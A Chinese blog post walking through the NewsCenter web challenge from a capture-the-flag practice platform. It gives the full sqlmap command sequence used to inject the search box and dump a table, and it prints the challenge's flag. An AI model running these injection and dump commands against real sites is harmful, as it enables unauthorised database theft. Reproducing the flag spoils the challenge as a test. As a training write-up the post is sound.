• 博客园logo
  • 会员
  • 众包
  • 新闻
  • 博问
  • 闪存
  • 赞助商
  • HarmonyOS
  • Chat2DB
    • 搜索
      所有博客
    • 搜索
      当前博客
  • 写随笔 我的博客 短消息 简洁模式
    用户头像
    我的博客 我的园子 账号设置 会员中心 简洁模式 ... 退出登录
    注册 登录
梅不美
博客园    首页    新随笔    联系   管理    订阅  订阅
攻防世界-web进阶-NewsCenter

打开文件发现有个搜索框,考虑是XSS或SQL注入,输入弹框语句不显示考虑到SQL注入,用burpsuit抓包将抓包信息保存为txt,用sqlmap爆破。

输入:sqlmap -r “sql.txt”,输出如下数据库版本信息为MYSQL

 

 

 

接着输入:sqlmap -r “sql.txt” --current-db 输出当前使用的数据库名为news

 

 

 

接着输入:sqlmap -r “sql.txt” -D news --tables输出当前的表名,猜测flag应该在secret_table中

 

 

 

输入:sqlmap -r “sql.txt” -D news -T secret_table --columns输入列

 

 

 

输入:sqlmap -r “sql.txt” -D news -T secret_table --dump输出flag信息。

 

QCTF{sq1_inJec7ion_ezzz}

 

posted on 2020-05-12 14:10  梅不美  阅读(393)  评论(0)    收藏  举报
刷新页面返回顶部
博客园  ©  2004-2025
浙公网安备 33010602011771号 浙ICP备2021040463号-3